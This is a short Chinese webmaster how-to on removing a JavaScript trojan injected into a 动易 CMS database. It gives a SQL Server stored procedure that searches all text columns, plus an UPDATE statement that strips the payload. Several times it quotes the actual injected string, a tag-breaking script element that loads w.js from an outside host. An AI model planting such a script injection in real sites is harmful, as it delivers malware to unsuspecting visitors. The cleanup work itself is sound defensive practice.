解析 木马 手动删去动易数据库被注入JS代码的方式
问题:动易数据库连续几天被注入JS代码,那么可不可以直接从数据库着手进行清除木马代码操作呢? 数据库被注入的代码是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!-- 解决:发现在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一个一个去查,是比较费时费力的,那么我们可以通过一个全库搜索的方法,建立一个存储过程 create proc p_search @str Nvarchar(1000) --要搜索的字符串 as if @str='' return declare @s Nvarchar(4000) create table #t(表名 sysname,字段名 sysname) declare tb cursor local for select s='if exists(select 1 from ['+replace(b.name,']',']]')+'] where ['+a.name+'] like N''%'+@str+'%'') print ''所在的表及字段: ['+b.name+'].['+a.name+']''' from syscolumns a join sysobjects b on a.id=b.id where b.xtype='U' and a.status>=0 and a.xtype in(175,239,99,35,231,167) open tb fetch next from tb into @s while @@fetch_status=0 begin exec(@s) fetch next from tb into @s end close tb deallocate tb GO 执行:p_search '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--' 找到被注入的表及字段,执行恢复操作,下面是一个例子 UPDATE PE_Class SET Tips= Replace(Tips,'"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--','') (编辑:银川站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |